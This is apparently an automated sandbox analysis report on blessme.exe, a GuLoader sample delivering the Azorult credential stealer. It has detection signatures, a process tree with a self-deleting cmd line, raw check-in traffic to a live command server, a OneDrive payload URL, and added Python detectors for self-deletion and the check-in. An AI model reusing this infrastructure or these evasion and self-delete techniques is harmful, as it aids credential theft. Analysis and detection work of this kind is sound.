Analysis Report blessme.exe

Overview

General Information

Sample Name: blessme.exe
Analysis ID: 314269
MD5: f5965e74cd4f98349e4e006263075be6
SHA1: 4b19d6b4d6c4c284a050aa1f01dabd575194a29c
SHA256: d648c31e655e998c47be5931bbaf9e861cc52a8ca38d1b0d667d53c294ec68c7
Tags: exe, GuLoader

Most interesting Screenshot:

Detection

Azorult, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • blessme.exe (PID: 5456 cmdline: 'C:\Users\user\Desktop\blessme.exe' MD5: F5965E74CD4F98349E4E006263075BE6)
    • blessme.exe (PID: 4396 cmdline: 'C:\Users\user\Desktop\blessme.exe' MD5: F5965E74CD4F98349E4E006263075BE6)
      • cmd.exe (PID: 2576 cmdline: 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'blessme.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 6148 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup
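The cmd.exe line in this tree is the sample removing its own image after a short delay (timeout.exe 3, then del 'blessme.exe'). No Sigma rule matched this run (see the Sigma Overview below), but the pattern is easy to correlate from process-creation telemetry: a cmd.exe whose parent is the sample, whose command line chains a delay with del, and whose del target is the parent's own file name. The Python below is an added example, not part of the Joe Sandbox report, that implements that correlation over constructed process-creation events mirroring this tree. The parent of PID 5456, the benign contrast events and the ping -n form of the delay are assumptions; the report shows only the timeout form.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields) that mirror the
# process tree in the report. Hypothetical records, not real telemetry: PIDs and paths
# of the sample's processes are taken from the report, everything else is made up.
EVENTS = [
    {"pid": 5456, "ppid": 1000, "image": r"C:\Users\user\Desktop\blessme.exe",
     "cmdline": r"C:\Users\user\Desktop\blessme.exe"},
    {"pid": 4396, "ppid": 5456, "image": r"C:\Users\user\Desktop\blessme.exe",
     "cmdline": r"C:\Users\user\Desktop\blessme.exe"},
    {"pid": 2576, "ppid": 4396, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'blessme.exe'"},
    {"pid": 6148, "ppid": 2576, "image": r"C:\Windows\system32\timeout.exe",
     "cmdline": r"C:\Windows\system32\timeout.exe 3"},
    # Benign contrast case (hypothetical): an admin script deleting a stale log after a delay.
    {"pid": 900, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\rotate.ps1"},
    {"pid": 7000, "ppid": 900, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd.exe /c timeout 3 & del C:\temp\old.log"},
]

# A delay (timeout N, or the "ping -n N <host>" idiom that other loaders use in its place;
# the report shows only timeout) chained with del/erase. The deleted file name is captured.
SELF_DELETE_RE = re.compile(
    r"(?:timeout(?:\.exe)?\s+(?:/t\s+)?\d+|ping(?:\.exe)?\s+(?:-n|/n)\s+\d+\s+\S+)"
    r"\s*&&?\s*(?:del|erase)\s+(?:/[a-z]\s+)*[\"']?(?P<target>[^\"'&|\s]+)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_self_deletion(events):
    """Return (parent_pid, cmd_pid, parent_image) for every cmd.exe whose delayed
    del/erase targets the image of the process that spawned it."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != "cmd.exe":
            continue
        m = SELF_DELETE_RE.search(e["cmdline"])
        if not m:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue  # parent outside the event window; nothing to correlate against
        if basename(m.group("target")) == basename(parent["image"]):
            hits.append((parent["pid"], e["pid"], parent["image"]))
    return hits


if __name__ == "__main__":
    for ppid, pid, image in find_self_deletion(EVENTS):
        print(f"self-deletion: PID {ppid} ({image}) spawned cmd.exe PID {pid} to delete its own image")
```

The correlation step is what keeps this from firing on every delayed del: the benign rotate.ps1 case above chains the same timeout & del but targets a log file, not its parent's executable, so it is not reported.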

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000001.00000002.304082523.000000001E080000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000001.00000002.300469829.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security
00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: blessme.exe PID: 5456 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: blessme.exe | Avira: detected
Multi AV Scanner detection for submitted file
Source: blessme.exe | Virustotal: Detection: 36%
Source: blessme.exe | ReversingLabs: Detection: 33%
Machine Learning detection for sample
Source: blessme.exe | Joe Sandbox ML: detected

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2029467 ET TROJAN Win32/AZORult V3.3 Client Checkin M14 192.168.2.5:49727 -> 202.52.146.108:80
Source: Traffic | Snort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 202.52.146.108:80 -> 192.168.2.5:49727
Source: Joe Sandbox View | ASN Name: GMEDIA-AS-IDGlobalMediaTeknologiPTID
Source: global traffic | HTTP traffic detected:
POST /roky/PL341/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: laninesolution.com
Content-Length: 101
Cache-Control: no-cache
Data Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 60 8b 30 63 8b 30 63 e8 26 66 9e 45 17 8b 31 11 ea 26 66 9d 40 17 e8 47 70 9d 30 10 8b 31 11 8b 30 60 ec 26 66 9d 26 66 98 26 66 9a 46 13 8b 30 67
Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b0`0c0c&fE1&f@Gp010`&f&f&fF0g
Source: global traffic | HTTP traffic detected:
POST /roky/PL341/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: laninesolution.com
Content-Length: 38654
Cache-Control: no-cache
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Source: unknown | HTTP traffic detected: POST /roky/PL341/index.php HTTP/1.1 (the same 101-byte check-in shown above)
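The two POSTs to laninesolution.com listed above are the AZORult check-in (101 bytes) and the follow-up upload (38654 bytes) that the ET Snort rules 2029467 and 2029136 fired on. The Python below is an added example, not part of the Joe Sandbox report and not the content of those ET rules (the report does not reproduce them). It parses the 101-byte request as printed in the report, with the headers re-split onto CRLF lines and the body hex copied verbatim from Data Raw, reproduces the report's Data Ascii rendering as a consistency check on the transcription, and applies three structural triage heuristics of the editor's own choosing. The benign contrast request is constructed.

```python
import re

# The 101-byte AZORult check-in from the report: body hex copied verbatim from "Data Raw".
CHECKIN_HEX = (
    "00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d "
    "37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 60 8b "
    "30 63 8b 30 63 e8 26 66 9e 45 17 8b 31 11 ea 26 66 9d 40 17 e8 47 70 9d 30 10 8b "
    "31 11 8b 30 60 ec 26 66 9d 26 66 98 26 66 9a 46 13 8b 30 67"
)
# Header block as printed in the report, re-split onto CRLF lines (the report runs them together).
CHECKIN_RAW = (
    b"POST /roky/PL341/index.php HTTP/1.1\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\n"
    b"Host: laninesolution.com\r\n"
    b"Content-Length: 101\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
) + bytes.fromhex(CHECKIN_HEX)

# Constructed contrast case (hypothetical, not from the report): an ordinary browser GET.
BENIGN_RAW = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/78.0\r\n"
    b"Accept: text/html\r\n"
    b"\r\n"
)


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("request has no end-of-headers marker")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def data_ascii(body: bytes) -> str:
    """Render a body the way the report's 'Data Ascii' column does: keep 0x20-0x7e, drop the rest."""
    return "".join(chr(b) for b in body if 0x20 <= b <= 0x7E)


def triage(req: dict) -> list:
    """Cheap structural hints saying why a human should look at this flow. These are the
    editor's heuristics, not the ET rule that fired in the report."""
    findings = []
    body = req["body"]
    declared = req["headers"].get("content-length")
    if declared is not None and int(declared) != len(body):
        findings.append("content-length-mismatch")
    ua = req["headers"].get("user-agent", "")
    # IE 6 beta on Windows XP is not what a current host emits; the report's sandbox is w10x64.
    if re.search(r"MSIE [1-6]\.", ua) and "Windows NT 5.1" in ua:
        findings.append("legacy-user-agent")
    # A POST with no Content-Type and a mostly non-printable body is an opaque custom protocol.
    if req["method"] == "POST" and body and "content-type" not in req["headers"]:
        printable = sum(1 for b in body if 0x20 <= b <= 0x7E)
        if printable / len(body) < 0.9:
            findings.append("opaque-post-body")
    return findings


if __name__ == "__main__":
    req = parse_request(CHECKIN_RAW)
    print(req["method"], req["path"], req["headers"]["host"], len(req["body"]), "bytes")
    print("Data Ascii:", data_ascii(req["body"]))
    print("findings:", triage(req))
    print("benign findings:", triage(parse_request(BENIGN_RAW)))
```

The Data Ascii check matters when copying bytes out of a rendered report: if the transcribed hex did not reproduce the report's printable rendering character for character, the body in hand is not the body that was sent, and anything derived from it (hashes, decoding attempts, rule content) would be wrong.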
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: blessme.exe, 00000001.00000002.300644559.0000000000937000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: blessme.exe, 00000001.00000003.286430689.0000000000937000.00000004.00000001.sdmp | String found in binary or memory: http://laninesolution.com/
Source: blessme.exe, 00000001.00000003.286414105.0000000000914000.00000004.00000001.sdmp, blessme.exe, 00000001.00000002.304075779.000000001E070000.00000004.00000001.sdmp | String found in binary or memory: http://laninesolution.com/roky/PL341/index.php
Source: blessme.exe, 00000001.00000002.300668642.0000000000974000.00000004.00000020.sdmp | String found in binary or memory: http://laninesolution.com/roky/PL341/index.php/?LinkId=838604LMEM
Source: blessme.exe, 00000001.00000003.286414105.0000000000914000.00000004.00000001.sdmp | String found in binary or memory: http://laninesolution.com/roky/PL341/index.php3?-
Source: blessme.exe, 00000001.00000002.300644559.0000000000937000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0N
Source: blessme.exe, 00000001.00000002.300644559.0000000000937000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico$
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.1.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: http://www.mozilla.com0
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp, blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.c
Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=ieh
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp%
Source: blessme.exe, 00000001.00000002.300607408.00000000008D7000.00000004.00000020.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp141k
Source: blessme.exe, 00000001.00000002.300607408.00000000008D7000.00000004.00000020.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp4-
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehpyo
Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/Jhttps://login.live.com/login.srf
Source: blessme.exe, 00000001.00000002.300644559.0000000000937000.00000004.00000020.sdmp | String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpv
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doublecl
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp, blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp, blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp, blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: blessme.exe, 00000001.00000003.286414105.0000000000914000.00000004.00000001.sdmp | String found in binary or memory: https://6lz4zg.bl.files.1drv.com/?R
Source: blessme.exe, 00000001.00000003.286414105.0000000000914000.00000004.00000001.sdmp | String found in binary or memory: https://6lz4zg.bl.files.1drv.com/ES
Source: blessme.exe, 00000001.00000003.286414105.0000000000914000.00000004.00000001.sdmp, blessme.exe, 00000001.00000002.300644559.0000000000937000.00000004.00000020.sdmp, blessme.exe, 00000001.00000003.286430689.0000000000937000.00000004.00000001.sdmp | String found in binary or memory: https://6lz4zg.bl.files.1drv.com/y4mAe1ML5DsfBtzn8lrlRwj13-2E_lTE8eOunDRBc6Q4LRlRNSMmtCgFMngEDi0VqDp
Source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp, blessme.exe, 00000001.00000003.295661722.0000000000971000.00000004.00000001.sdmp | String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp, blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp | String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: blessme.exe, 00000001.00000002.300644559.0000000000937000.00000004.00000020.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp, blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmp | String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authoriz
Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmp | String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp, blessme.exe, 00000001.00000003.295661722.0000000000971000.00000004.00000001.sdmp | String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: blessme.exe, 00000001.00000002.300607408.00000000008D7000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/
Source: blessme.exe, 00000001.00000003.286406175.000000000090C000.00000004.00000001.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21248&authkey=AKE-1uO
Source: blessme.exe, 00000001.00000002.300607408.00000000008D7000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/y
Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp, blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/d
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/h
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png1
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/static/images/faviconsV
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/staticE
Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/thank-you.html
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=l
Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=l?
            Source: blessme.exe, 00000001.00000003.286406175.000000000090C000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21248&authkey=AKE-1uO
            Source: blessme.exe, 00000001.00000002.300607408.00000000008D7000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/y
            Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp, blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/d
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/h
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png1
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/faviconsV
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/staticE
            Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
            Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=l
            Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=l?
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_0216176D NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_021604B1 EnumWindows,NtSetInformationThread,LoadLibraryA
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_021664CB NtProtectVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_0216695D NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02162A0A NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166A0A NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02162A36 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166A3B NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_0216222A NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166A67 NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02162A94 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02165AB7 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02162AFE NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166AE0 NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02165B06 NtSetInformationThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166B32 NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166B57 NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02164B58 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02162768 NtWriteVirtualMemory,LoadLibraryA
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02162B8E NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02166BCE NtResumeThread
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02162BF3 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_021627E3 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\blessme.exe | Code function: 0_2_02162831 NtWriteVirtualMemory
